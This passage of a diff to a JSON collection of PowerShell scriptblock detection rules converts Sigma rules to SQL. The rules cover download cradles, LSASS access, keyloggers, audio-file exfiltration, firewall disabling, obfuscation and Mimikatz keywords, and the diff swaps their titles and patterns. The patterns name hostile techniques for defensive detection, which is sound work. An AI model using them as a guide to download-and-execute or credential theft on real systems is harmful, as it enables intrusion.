(ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "status": "test", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ], + "falsepositives": [ + "Legitimate user creation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + ], + "filename": "posh_ps_create_local_user.yml" + }, + { + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": "posh_ps_enable_psremoting.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_audio_exfiltration.yml" }, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "status": "test", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1546.013" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", - "author": "frack113", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1565" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "author": "frack113", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", "status": "test", - "description": "Powershell use PassThru option to start in background", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "status": "experimental", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", - "status": "experimental", - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", 